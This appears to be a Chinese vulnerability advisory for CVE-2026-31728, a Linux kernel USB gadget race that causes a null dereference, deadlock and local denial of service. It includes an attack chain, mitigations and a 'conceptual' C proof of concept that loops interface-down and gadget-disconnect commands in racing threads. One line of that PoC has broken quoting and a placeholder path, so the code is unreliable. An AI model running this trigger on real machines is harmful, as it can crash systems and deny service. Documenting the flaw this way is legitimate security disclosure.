CVE-2026-31728 CVSS 4.7 中危

CVE-2026-31728 Linux内核USB小工具竞致死锁漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31728

漏洞类型

竞态条件

CVSS评分

4.7 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核USB小工具驱动中存在竞态条件漏洞。当`gether_disconnect`与`eth_stop`并发执行时，可导致空指针解引用，引发内核死锁和系统崩溃，造成拒绝服务。

技术细节

该漏洞源于Linux内核USB gadget子系统中`gether_disconnect`与`eth_stop`函数之间的竞态条件。具体场景下，当`gether_disconnect`正在执行端点拆除操作时，若`eth_stop`被并发触发，它会尝试访问已被清除的端点描述符，从而触发内核空指针解引用异常。由于`eth_stop`在崩溃过程中持有`dev->lock`自旋锁，导致执行`gether_disconnect`的线程无法获取该锁，CPU陷入无限自旋状态，最终引发系统硬锁定。根本原因在于`dev->port_usb`指针的清理操作被延迟到了函数末尾，未能在断开连接发生的第一时间切断关联。

攻击链分析

STEP 1

步骤1：本地访问

攻击者需要具备本地低权限访问权限（AV:L, PR:L），能够执行代码或触发系统操作。

STEP 2

步骤2：触发竞态

攻击者并发触发USB小工具的断开连接操作（gether_disconnect）和网络接口停止操作（eth_stop）。

STEP 3

步骤3：系统崩溃

竞态条件导致空指针解引用，随后因锁争用引发死锁，导致内核崩溃或系统硬锁定。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual Proof of Concept for CVE-2026-31728
 * This code attempts to trigger the race condition between
 * gether_disconnect and eth_stop in the Linux kernel.
 */

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>

// Simulate the operations that trigger the vulnerability
void* trigger_ether_stop(void* arg) {
    // In a real scenario, this corresponds to bringing down the interface
    // e.g., 'ip link set usb0 down' which calls eth_stop()
    while(1) {
        // System call or ioctl to stop network interface
        system("ip link set usb0 down");
        usleep(100);
    }
    return NULL;
}

void* trigger_gadget_disconnect(void* arg) {
    // In a real scenario, this corresponds to disconnecting the USB gadget
    // e.g., via configfs or physical disconnect triggering gether_disconnect()
    while(1) {
        // System call to disconnect USB gadget
        system("echo " > /sys/class/udc/.../disconnect"); // Pseudo path
        usleep(100);
    }
    return NULL;
}

int main() {
    pthread_t t1, t2;

    printf("[+] Triggering race condition for CVE-2026-31728...\n");

    // Create threads to race against each other
    pthread_create(&t1, NULL, trigger_ether_stop, NULL);
    pthread_create(&t2, NULL, trigger_gadget_disconnect, NULL);

    // Wait for threads (in practice, the kernel may crash before this)
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    return 0;
}

影响范围

Linux Kernel (stable branches prior to fix)

Linux Kernel < Commit 6ad77458637b78ec655e3da5f112c862e6690a9d

Linux Kernel < Commit 8ff689edfeceb5e3ec1623e09af2b2aa0f1098a8

防御指南

临时缓解措施

如果暂无法升级内核，建议禁用Linux内核配置中的USB Gadget功能（CONFIG_USB_GADGET），或者严格限制对相关sysfs和configfs接口的访问，以防止本地用户触发该漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表